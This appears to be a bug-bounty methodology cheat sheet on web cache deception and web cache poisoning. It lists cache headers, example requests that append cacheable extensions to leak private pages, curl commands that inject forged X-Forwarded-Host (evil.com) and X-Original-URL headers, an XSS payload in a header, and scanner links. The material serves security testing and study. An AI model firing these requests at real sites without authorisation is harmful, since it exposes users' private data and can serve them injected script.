Web Cache

Cache Headers

Header	Provenance	Meaning
X-Cache: HIT	Generic caches (Varnish, Squid)	Response served from the server or proxy cache.
CF-Cache-Status: HIT	Cloudflare (CDN)	Response served from Cloudflare's cache.

Web Cache Deception

Web cache deception | Web Security AcademyWebSecAcademy

Web_Hacking/Cache Deception.md at main · Mehdi0x90/Web_HackingGitHub

Bug-Bounty-Methodology/Web Cache Deception.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Detection

X-Cache: HIT or CF-Cache-Status: HIT (depending on the cache used)

Cache-Control: public -> That means anyone could potentially retrieve this response.

Example 1

GET /profile HTTP/1.1
Host: example.com

Response :

<html>
  <body>
    <h1>Hello, Admin</h1>
    <p>Email: admin@example.com</p>
  </body>
</html>

This page should not be put in cache

Try adding .jpg / .js / .css

GET /profile.jpg HTTP/1.1
Host: example.com

Example 2

• Normal Request

GET /profile/setting HTTP/1.1
Host: www.vuln.com

The response is

HTTP/2 200 OK 
Content-Type: text/html
Cf-Cache-Status: HIT 
...

1. Try to add cacheable extension (For example .js / .css / .jpg, etc.)

GET /profile/setting/.js HTTP/1.1
Host: www.vuln.com

The response is

HTTP/2 200 OK 
Content-Type: text/html
Cf-Cache-Status: HIT 
...

If the Cf-Cache-Status / X-Cache response the request with HIT not MISS or Error. And then try to open the url in incognito mode

Example 3

1. Add ; before the extension (For example ;.js / ;.css / ;.jpg, etc.)

GET /profile/setting/;.js HTTP/1.1
Host: www.vuln.com

The response is

HTTP/2 200 OK 
Content-Type: text/html
Cf-Cache-Status: HIT 
...

If the Cf-Cache-Status / X-Cache response the request with HIT not MISS or Error. And then try to open the url in incognito mode

Other things to test:

• www.example.com/profile.php/.js

• www.example.com/profile.php/.css

• www.example.com/profile.php/test.js

• www.example.com/profile.php/../test.js

• www.example.com/profile.php/%2e%2e/test.js

• Use lesser known extensions such as .avif

Burp extension

Web Cache Deception Scanner

Web Cache Poisoning

Practical Web Cache PoisoningPortSwigger Research

Bug-Bounty-Methodology/Web Cache Poisoning.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

Detection

Query parameters

curl -I "https://victime.com/?x=evil

Look for evil and X-Cache: HIT / CF-Cache-Status: HIT in the response

Headers

curl -I https://victime.com/ -H "X-Forwarded-Host: evil.com"

Look for evil.com in the response

curl -I https://victime.com/ -H "X-Original-URL: /malicious-path"

If the response contains X-Cache: HIT / CF-Cache-Status: HIT and the returned page is malicious or incorrect, it means the cache has been poisoned.

curl -I https://victime.com/ -H "X-Forwarded-For: 1.2.3.4"

If the server sends a response with X-Cache: HIT / CF-Cache-Status: HIT and the page corresponds to a malicious page (e.g., an error page or an admin page), it is possible that the cache has been poisoned with an incorrect response.

curl -I https://victime.com/ -H "X-Original-URL: /profile" -H "X-Forwarded-For: 1.2.3.4" -H "X-Forwarded-Host: evil.com"

XSS

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"

Param Miner - Burp Extension

Web cache poisoning | Web Security AcademyWebSecAcademy

Right-click on a request that you want to investigate and click "Guess headers"

Tools

GitHub - Hackmanit/Web-Cache-Vulnerability-Scanner: Web Cache Vulnerability Scanner is a Go-based CLI tool for testing for web cache poisoning. It is developed by Hackmanit GmbH (http://hackmanit.de/).GitHub

GitHub - xhzeem/toxicache: Go scanner to find web cache poisoning vulnerabilities in a list of URLsGitHub

GitHub - Th0h0/autopoisoner: Web cache poisoning vulnerability scanner.GitHub

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Resources

Cache Poisoning and Cache Deception - HackTricks